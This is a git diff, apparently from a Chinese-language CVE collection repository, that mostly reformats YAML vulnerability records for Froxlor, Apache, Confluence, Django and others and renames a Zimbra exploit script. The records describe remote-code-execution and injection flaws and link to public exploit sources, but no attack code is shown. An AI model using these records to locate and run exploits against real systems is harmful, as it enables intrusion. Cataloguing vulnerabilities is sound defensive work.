diff --git a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml index 7cd4ff5e33a30081e24c43d0609960766aa5866f..6e50fa4132dc90acbf7eaaaf8b7c6204905a42c6 100644 --- a/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml +++ b/cve/Froxlor/2021/yaml/CVE-2021-42325.yaml @@ -1,6 +1,5 @@ id: CVE-2021-42325 -source: - https://www.exploit-db.com/exploits/50502 +source: https://www.exploit-db.com/exploits/50502 info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high @@ -8,7 +7,7 @@ info: Froxlor是Froxlor团队的一套轻量级服务器管理软件。 Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。 scope-of-influence: - Froxlor 0.9~0.10.30 + 0.9 < Froxlor < 0.10.30 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42325 - https://avd.aliyun.com/detail?id=AVD-2021-42325 diff --git a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml index 5823536abbef629b12ff077f4ea608daf7ab157d..1dca795a263837667089473f84550fa9305eada9 100644 --- a/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml +++ b/cve/Froxlor/2023/yaml/CVE-2023-0315.yaml @@ -1,13 +1,12 @@ id: CVE-2023-0315 -source: - https://github.com/mhaskar/CVE-2023-0315 +source: https://github.com/mhaskar/CVE-2023-0315 info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high description: | Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。攻击者可以在未经身份验证的情况下利用这个漏洞在OS级别执行任意代码。 scope-of-influence: - Froxlor 2.0.8 之前的版本 + Froxlor < 2.0.8 reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-0315 - https://github.com/froxlor/froxlor/commit/090cfc26f2722ac3036cc7fd1861955bc36f065a diff --git a/cve/Froxlor/2023/yaml/CVE-2023-0877.yaml b/cve/Froxlor/2023/yaml/CVE-2023-0877.yaml index c65b99eaf5fa6ce246dfb9eaaa9cbb600cd9ecce..792cb12794592e64a58b643da2c8c86d51dde287 100644 --- a/cve/Froxlor/2023/yaml/CVE-2023-0877.yaml +++ b/cve/Froxlor/2023/yaml/CVE-2023-0877.yaml @@ -1,13 +1,12 @@ id: CVE-2023-0877 -source: - https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8/ +source: https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8/ info: name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。 severity: high description: | Code Injection in GitHub repository froxlor/froxlor prior to 2.0.11. scope-of-influence: - Froxlor before 2.0.8 + Froxlor < 2.0.8 reference: - https://github.com/blakduk/Advisories - https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8/ diff --git a/cve/Grafana/2021/yaml/CVE-2021-43798.yaml b/cve/Grafana/2021/yaml/CVE-2021-43798.yaml index 6580d144188b424c6454b72efa75c6b32853e90a..79e07b158c4feb9ad8afe483b3e9f52d9781a41f 100644 --- a/cve/Grafana/2021/yaml/CVE-2021-43798.yaml +++ b/cve/Grafana/2021/yaml/CVE-2021-43798.yaml @@ -10,7 +10,7 @@ info: reference: - https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-43798 cwe-id: CWE-22 diff --git a/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml index eaf35209943ec4becb161261a0bd3936c528cf5b..685d9c26d921905d07a8de655799aca083a1962d 100644 --- a/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml +++ b/cve/InfluxDB/2019/yaml/CVE-2019-20933.yaml @@ -4,9 +4,9 @@ info: name: InfluxDB 1.7.6之前版本中的services/httpd/handler.go中的authenticate函数存在认证绕过漏洞。该漏洞源于JWT令牌可能具有空SharedSecret。攻击者可利用该漏洞绕过认证。 severity: critical description: | - InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). + InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret). scope-of-influence: - InfluxData InfluxDB <1.7.6 + InfluxData InfluxDB < 1.7.6 reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-20933 classification: diff --git a/cve/Java-SE/2022/yaml/CVE-2022-21449.yaml b/cve/Java-SE/2022/yaml/CVE-2022-21449.yaml index b95ffd9b823c26b5f87a682f0d893248b7f496fc..1d218dd7bd156fd89b8cd4add379a62ed3efefed 100644 --- a/cve/Java-SE/2022/yaml/CVE-2022-21449.yaml +++ b/cve/Java-SE/2022/yaml/CVE-2022-21449.yaml @@ -4,7 +4,9 @@ info: name: Java SE(Java Standard Edition,Java 标准版)是Java技术的核心和基础,是Java ME和Java EE编程的基础。Java SE是Java程序设计语言和Java平台的总称。 severity: high description: Oracle Java SE(组件:库)中存在漏洞。易被利用的漏洞允许未经身份验证的攻击者通过多种协议进行网络访问,从而危害Oracle Java SE、Oracle GraalVM Enterprise Edition。成功攻击此漏洞会导致对关键数据或所有Oracle Java SE、Oracle GraalVM Enterprise Edition可访问数据进行未经授权的创建、删除或修改访问。 - scope-of-influence: Oracle Java SE:17.0.2和18;Oracle GraalVM企业版:21.3.1和22.0.0.2 + scope-of-influence: + Oracle Java SE:17.0.2和18 + Oracle GraalVM企业版:21.3.1和22.0.0.2 reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21449 - https://security.netapp.com/advisory/ntap-20220429-0006/ diff --git a/cve/WordPress/2019/yaml/CVE-2019-8942.yaml b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml index 4223ef65fc6d4cb17e9e9d205871bc2243a17f30..b0147978bfe488e7916d4a6853c0cd14911d06a3 100644 --- a/cve/WordPress/2019/yaml/CVE-2019-8942.yaml +++ b/cve/WordPress/2019/yaml/CVE-2019-8942.yaml @@ -1,6 +1,5 @@ id: CVE-2019-8942 -source: - https://github.com/synacktiv/CVE-2019-8942 +source: https://github.com/synacktiv/CVE-2019-8942 info: name: WordPress是一款免费开源的内容管理系统(CMS),目前已经成为全球使用最多的CMS建站程序。 severity: high diff --git a/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py b/cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py similarity index 99% rename from cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py rename to cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py index d440f7e6ad590541df5cfcb09723f758a5e5975f..f447f3d2d0fe9b9b3b3a71c93bd5a962847adb7e 100644 --- a/cve/Zimbra/2022/CVE-2022-41352/cve-2022-41352.py +++ b/cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py @@ -233,4 +233,4 @@ The available modes are: args = p.parse_args() - main(args) + main(args) \ No newline at end of file diff --git a/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml b/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml index 883d103f4046c2f7624ddf38cb766b838197bbdb..a70bb45707c839a726eb99898c0f5c46950fe142 100644 --- a/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml +++ b/cve/apache-Apsix/2022/yaml/CVE-2022-24112.yaml @@ -11,7 +11,7 @@ info: - https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2022-24112 cwe-id: CWE-290 cnvd-id: None diff --git a/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml b/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml index 50fd50933b6fd9d54ff9e4a4ad5160724bc76d9b..f1346b553181ae448f22997172a3999f35e9e133 100644 --- a/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml +++ b/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml @@ -8,8 +8,8 @@ info: scope-of-influence: apache-CouchDB < 3.2.2 reference: - - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-... - - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code... + - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code-Execution.html - http://www.openwall.com/lists/oss-security/2022/04/26/1 - http://www.openwall.com/lists/oss-security/2022/05/09/1 - http://www.openwall.com/lists/oss-security/2022/05/09/2 @@ -17,7 +17,7 @@ info: - http://www.openwall.com/lists/oss-security/2022/05/09/4 - https://docs.couchdb.org/en/3.2.2/setup/cluster.html - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00 - - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti... + - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-settings-b1e9173a4bcd - https://www.openwall.com/lists/oss-security/2022/04/26/1 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H @@ -26,7 +26,4 @@ info: cwe-id: CWE-1188 cnvd-id: None kve-id: None - tags: - - 不安全的默认资源初始化 - - 弱口令要求 - - 远程代码执行 \ No newline at end of file + tags: 不安全的默认资源初始化, 弱口令要求, 远程代码执行 \ No newline at end of file diff --git a/cve/apache-Dubbo/2019/yaml/CVE-2019-17564.yaml b/cve/apache-Dubbo/2019/yaml/CVE-2019-17564.yaml index 2ae1946821aad57625ba6339d2e660e857b246ec..f467401d2147bd45fafce1655b052a8d8b7a061b 100644 --- a/cve/apache-Dubbo/2019/yaml/CVE-2019-17564.yaml +++ b/cve/apache-Dubbo/2019/yaml/CVE-2019-17564.yaml @@ -12,7 +12,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-17564 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-17564 cwe-id: CWE-502 diff --git a/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml b/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml index faf28d8b6d6d0252ca4fe88fa923903c93239c54..2a64f8c3a941363cdc4f0b298f558d88ada1d968 100644 --- a/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml +++ b/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml @@ -11,7 +11,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-25641 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-25641 cwe-id: CWE-502 diff --git a/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml b/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml index 1ba752b3e75dfa30047abf05aebfe1b231f0d1b6..dacaa27701a8e20aaba0b2570a1385c0d30c9cd6 100644 --- a/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml +++ b/cve/apache-Dubbo/2021/yaml/CVE-2021-43297.yaml @@ -11,7 +11,7 @@ info: - https://help.aliyun.com/document_detail/390193.html - https://lists.apache.org/thread/1mszxrvp90y01xob56yp002939c7hlww classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-43297 cwe-id: CWE-502 diff --git a/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml b/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml index 84888dbf308aaa0e8467a831cecbddc9e8f4617e..5908596e31c369af9160d8e62c60865cc68db0b4 100644 --- a/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml +++ b/cve/apache-Httpd/2020/yaml/CVE-2020-9490.yaml @@ -8,11 +8,10 @@ info: description: | Apache HTTP Server 2.4.20版本至2.4.43版本中存在安全漏洞,攻击者可借助‘Cache-Digest’标头中带有特制值的HTTP/2请求利用该漏洞造成Push Diary崩溃。 scope-of-influence: - Apache HTTP = 2.4.20-2.4.43 + 2.4.20 ≤ Apache HTTP ≤ 2.4.43 reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-9490 - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-9490 - classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 diff --git a/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml index 48a8205edb0b8d7dc92a9657083587c436d2dbbe..0fd3ca934296d73060b671b5d5d2f77e71b33247 100644 --- a/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml +++ b/cve/apache-Httpd/2021/yaml/CVE-2021-41773.yaml @@ -17,4 +17,4 @@ info: cwe-id: CWE-22 cnvd-id: None kve-id: None - tags: cve2021,Apache,目录遍历 \ No newline at end of file + tags: cve2021, Apache, 目录遍历 \ No newline at end of file diff --git a/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml b/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml index 25ad632212517b6cbcc0d219896e7dbee9fa5ad3..87bc94c690f5bd5cfe317cdfb1bcff990bf68408 100644 --- a/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml +++ b/cve/apache-Httpd/2021/yaml/CVE-2021-42013.yaml @@ -6,7 +6,7 @@ info: description: | Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。 scope-of-influence: - Apache HTTP = 2.4.49, Apache HTTP = 2.4.50 + 2.4.49 ≤ Apache HTTP ≤ 2.4.50 reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-42013 - https://httpd.apache.org/security/vulnerabilities_24.html @@ -17,4 +17,4 @@ info: cwe-id: CWE-22 cnvd-id: None kve-id: None - tags: cve2021,Apache,目录遍历,RCE \ No newline at end of file + tags: cve2021, Apache, 目录遍历, RCE \ No newline at end of file diff --git a/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml index 16b59c306cdbe0bbfa2771f8ff8443b4c6da3074..dc2f24c54448bac38306cdad3cfb9529aa1dded4 100644 --- a/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml +++ b/cve/apache-OFBiz/2021/yaml/CVE-2021-26295.yaml @@ -5,7 +5,6 @@ info: severity: critical description: CVE-2021-26295漏洞由RMI反序列化造成的远程代码执行漏洞,攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。 - scope-of-influence: Apache OFBiz < 17.12.06 reference: diff --git a/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml index 12fb0f1aced261e773290a27a814ff19ec8c1317..702f229ff58c101071de66d9b388eb9348a5b400 100644 --- a/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml +++ b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml @@ -6,7 +6,7 @@ info: description: | 在Apache Shiro中,RegexRequestMatcher可以被错误配置为在某些servlet容器上被绕过。应用程序使用RegExPatternMatcher和正则表达式中的'.'可能容易受到旁路授权的攻击。 scope-of-influence: - Apache Shiro 1.9.1之前 + Apache Shiro < 1.9.1 reference: - https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh - https://nvd.nist.gov/vuln/detail/CVE-2022-32532 @@ -14,10 +14,10 @@ info: - https://cxsecurity.com/cveshow/CVE-2022-32532/ - https://vigilance.fr/vulnerability/Oracle-Fusion-Middleware-vulnerabilities-of-October-2022-39612 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-32532 cwe-id: CWE-863 - cnvd-id: CNNVD-202206-2750 + cnvd-id: None kve-id: None tags: 旁路授权 \ No newline at end of file diff --git a/cve/apache-Struts/2017/yaml/CVE-2017-9805.yaml b/cve/apache-Struts/2017/yaml/CVE-2017-9805.yaml index 4b8f08c3e4dada3a5d09df63b66fffaf70d71eb4..e1ca89c001ccedfed6d3df8c18d7a7e7fbb76715 100644 --- a/cve/apache-Struts/2017/yaml/CVE-2017-9805.yaml +++ b/cve/apache-Struts/2017/yaml/CVE-2017-9805.yaml @@ -16,5 +16,4 @@ info: cwe-id: CWE-502 cnvd-id: None kve-id: None - tags: - - 远程命令执行 \ No newline at end of file + tags: 远程命令执行 \ No newline at end of file diff --git a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml index d66c1fe0a97dd377f0f3fe23b59afb78dc4f3053..8ff102a172a2a9fbf0043db7905908336e9e14ad 100644 --- a/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml +++ b/cve/apache-Struts/2018/yaml/CVE-2018-11776.yaml @@ -16,5 +16,4 @@ info: cwe-id: CWE-20 cnvd-id: None kve-id: None - tags: - - 远程命令执行 \ No newline at end of file + tags: 远程命令执行 \ No newline at end of file diff --git a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml index e1e4a6e846ed2f110965d3d2507c6fad252e1246..d33a68ae16c6a225aeb191adf5a8c17a73fe22d2 100644 --- a/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml +++ b/cve/apache-Struts/2019/yaml/CVE-2019-0230.yaml @@ -20,5 +20,4 @@ info: cwe-id: CWE-1321 cnvd-id: None kve-id: None - tags: - - 远程命令执行 + tags: 远程命令执行 diff --git a/cve/apache-solr/2021/yaml/CVE-2021-27905.yaml b/cve/apache-solr/2021/yaml/CVE-2021-27905.yaml index b10e9d5a578eb7d115cf3ff6d6b9b896413846ad..c47208c853cac6cde1b5cf794ba4e3e2d9007c7f 100644 --- a/cve/apache-solr/2021/yaml/CVE-2021-27905.yaml +++ b/cve/apache-solr/2021/yaml/CVE-2021-27905.yaml @@ -2,7 +2,7 @@ id: CVE-2021-27905 source: https://github.com/Henry4E36/Solr-SSRF info: name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 - severity: high + severity: Critical description: Apache Solr 8.8.2之前版本存在代码问题漏洞,攻击者可利用masterUrl参数将索引数据复制到本地内核中。 scope-of-influence: @@ -11,9 +11,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-27905 - https://security.netapp.com/advisory/ntap-20210611-0009/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.1 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2021-27905 - cnvd-id: CNNVD-202104-914 + cwe-id: CWE-918 + cnvd-id: None kve-id: None - tags: cve2021,Apache,Solr,SSRF + tags: cve2021, Apache, Solr, SSRF diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml index a8c37b12be698bd3a81175a9591da5b2a6412c14..c9e57971b2839a7565ec27a5f6cb5df3d86eda66 100644 --- a/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml +++ b/cve/apache-tomcat/2020/yaml/CVE-2020-13935.yaml @@ -15,7 +15,7 @@ info: - https://blog.redteam-pentesting.de/2020/websocket-vulnerability-tomcat/ - https://lists.apache.org/thread.html/rd48c72bd3255bda87564d4da3791517c074d94f8a701f93b85752651%40%3Cannounce.tomcat.apache.org%3E classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2020-13935 cwe-id: CWE-835 diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-1938.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-1938.yaml index 38a9cc6c670a93fc2e685dbc5f4f1dd01f028df5..0f7d54edeb8b9b2581f37eff44fe75d6ce2cbfb5 100644 --- a/cve/apache-tomcat/2020/yaml/CVE-2020-1938.yaml +++ b/cve/apache-tomcat/2020/yaml/CVE-2020-1938.yaml @@ -1,7 +1,7 @@ id: CVE-2020-1938 source: https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat info: - name: Java 是目前 Web 开发中主流的编程语言,而 Tomcat 是当前流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。 + name: Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 severity: critical description: Ghostcat(幽灵猫) 是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。 diff --git a/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml index e4cf2843d01133e28021b85a4daea0884c53fdda..ccee231269e043c194ffb24a8629b6637d446042 100644 --- a/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml +++ b/cve/apache-tomcat/2020/yaml/CVE-2020-9484.yaml @@ -1,7 +1,7 @@ id: CVE-2020-9484 source: https://github.com/RepublicR0K/CVE-2020-9484 info: - name: Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。 + name: Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。 severity: high description: 当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。 diff --git a/cve/apache-tomcat/2022/yaml/CVE-2022-29885.yaml b/cve/apache-tomcat/2022/yaml/CVE-2022-29885.yaml index 869c3135bc8ad0734197c39377f7ec43c215b178..9d0a4149674098265a0b08c3af1e65a5e30627b0 100644 --- a/cve/apache-tomcat/2022/yaml/CVE-2022-29885.yaml +++ b/cve/apache-tomcat/2022/yaml/CVE-2022-29885.yaml @@ -1,7 +1,7 @@ id: CVE-2022-29885 source: https://github.com/quynhlab/CVE-2022-29885 info: - name: Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。Apache Tomcat存在资源管理错误漏洞。攻击者利用该漏洞通过 EncryptInterceptor 导致 Apache Tomcat 过载,从而触发拒绝服务。 + name: Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 severity: high description: 当Tomcat开启集群配置,且通过NioReceiver通信时,无论服务端是否配置EncryptInterceptor,攻击者均可构造特制请求导致目标服务器拒绝服务。 diff --git a/cve/apache-unomi/2020/yaml/CVE-2020-13942.yaml b/cve/apache-unomi/2020/yaml/CVE-2020-13942.yaml index 7cd008cb68e9aee1c04894eb8f8e33b2c9dc8445..9ec1f93a2326d9b5614f856f91e62e6e6ce63013 100644 --- a/cve/apache-unomi/2020/yaml/CVE-2020-13942.yaml +++ b/cve/apache-unomi/2020/yaml/CVE-2020-13942.yaml @@ -1,6 +1,5 @@ id: CVE-2020-13942 -source: - None +source: None info: name: Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验,比如 GDPR 和“不跟踪”偏好设置。其最初于 Jahia 开发,2015 年 10 月提交给了 Apache 孵化器。 severity: critical diff --git a/cve/confluence/2019/yaml/CVE-2019-3394.yaml b/cve/confluence/2019/yaml/CVE-2019-3394.yaml index b79454abc7916761e4f6dc18ed9c4711b1d46a2d..005279378b9e2b6f118698ce0ab5abbd730be420 100644 --- a/cve/confluence/2019/yaml/CVE-2019-3394.yaml +++ b/cve/confluence/2019/yaml/CVE-2019-3394.yaml @@ -1,6 +1,5 @@ id: CVE-2019-3394 -source: - none +source: none info: name: Atlassian Confluence Server是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。Confluence Data Center是Confluence Center的数据中心版本。 severity: high diff --git a/cve/confluence/2019/yaml/CVE-2019-3396.yaml b/cve/confluence/2019/yaml/CVE-2019-3396.yaml index e91ff6d3daac7d1ce93443aa7b460cdf3aad2643..8cbe8d8eac4cc289d0449e128e0263b6a8688e51 100644 --- a/cve/confluence/2019/yaml/CVE-2019-3396.yaml +++ b/cve/confluence/2019/yaml/CVE-2019-3396.yaml @@ -1,5 +1,5 @@ id: CVE-2019-3396 -source: +source: https://github.com/Yt1g3r/CVE-2019-3396_EXP info: name: Confluence是一个专业的企业知识管理与协同软件,可用于构建企业wiki。 severity: critical @@ -20,4 +20,4 @@ info: cwe-id: CWE-22 cnvd-id: None kve-id: None - tags: RCE,cve2019,任意文件读取 \ No newline at end of file + tags: RCE, cve2019, 任意文件读取 \ No newline at end of file diff --git a/cve/confluence/2021/yaml/CVE-2021-26084.yaml b/cve/confluence/2021/yaml/CVE-2021-26084.yaml index ae6294f545a4a34804a278f43c08146d48e19084..c90bd51e43a9073d4b348fd6ce568266e03e3fdd 100644 --- a/cve/confluence/2021/yaml/CVE-2021-26084.yaml +++ b/cve/confluence/2021/yaml/CVE-2021-26084.yaml @@ -47,4 +47,4 @@ info: cwe-id: CWE-74 cnvd-id: None kve-id: None - tags: RCE,cve2021,OGNI注入 \ No newline at end of file + tags: RCE, cve2021, OGNI注入 \ No newline at end of file diff --git a/cve/confluence/2022/yaml/CVE-2022-26134.yaml b/cve/confluence/2022/yaml/CVE-2022-26134.yaml index 76029829737b632d6d4fddffb976533ec03272ea..0c76072899aeafdb60e308fe18a9c160b20de3a8 100644 --- a/cve/confluence/2022/yaml/CVE-2022-26134.yaml +++ b/cve/confluence/2022/yaml/CVE-2022-26134.yaml @@ -24,4 +24,4 @@ info: cwe-id: CWE-74 cnvd-id: None kve-id: None - tags: RCE,cve2022 \ No newline at end of file + tags: RCE, cve2022 \ No newline at end of file diff --git a/cve/confluence/2022/yaml/CVE-2022-26138.yaml b/cve/confluence/2022/yaml/CVE-2022-26138.yaml index d399d06b0dcfa01f9c0ce30e31a678cad9699ec4..9b39b96c6afe83a6860d8d816cc4a892bccb385d 100644 --- a/cve/confluence/2022/yaml/CVE-2022-26138.yaml +++ b/cve/confluence/2022/yaml/CVE-2022-26138.yaml @@ -1,6 +1,5 @@ id: CVE-2022-26138 -source: - https://github.com/shavchen/CVE-2022-26138 +source: https://github.com/shavchen/CVE-2022-26138 info: name: Confluence是atlassian公司的产品,是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。 severity: critical @@ -20,4 +19,4 @@ info: cwe-id: CWE-798 cnvd-id: None kve-id: None - tags: RCE,cve2022 \ No newline at end of file + tags: RCE, cve2022 \ No newline at end of file diff --git a/cve/django/2021/yaml/CVE-2021-31542.yaml b/cve/django/2021/yaml/CVE-2021-31542.yaml index f4db55bd543c3a36b5ae949d44888fd7a508c534..d70c7c6301f2edbfb281b6d27025831cb9155539 100644 --- a/cve/django/2021/yaml/CVE-2021-31542.yaml +++ b/cve/django/2021/yaml/CVE-2021-31542.yaml @@ -1,6 +1,5 @@ id: CVE-2021-31542 -source: - https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/Django/CVE-2021-31542.md +source: https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/Django/CVE-2021-31542.md info: name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。 severity: high diff --git 